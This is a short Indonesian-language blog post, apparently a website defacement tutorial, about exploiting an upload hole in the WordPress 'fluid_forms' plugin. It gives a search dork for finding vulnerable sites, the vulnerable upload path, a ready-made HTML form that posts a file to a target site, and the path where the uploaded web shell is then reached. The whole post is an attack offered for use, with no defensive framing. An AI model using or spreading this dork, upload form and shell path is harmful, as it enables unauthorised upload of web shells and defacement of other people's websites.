Header Ads

Defece Menggunakan WordPress deface Fluid_forms Upload Vulnerability Exploit


#Type: CSRF & Xampp, Uploadify
#Tested: Windows XP, 7, 8, BackBox
#CMS: WordPress

Dork: inurl:fluid_forms or inurl:"/wp-content/plugins/fluid_forms/file-upload/" 

Exploit: /wp-content/plugins/fluid_forms/ file upload/server/php/

CSRF , simpan dengan ext .html ya 


 <form method="POST" action="http://www.site.com/wp-content/plugins/fluid_forms/file-upload/server/php/"enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button><br/></form>

kalau vuln nanti akan keluar [] 

Akses shelmu : /wp-content/plugins/fluid_forms/file-upload/server/php/files/shellmu.php 


Semoga bermanfaat

No comments

Powered by Blogger.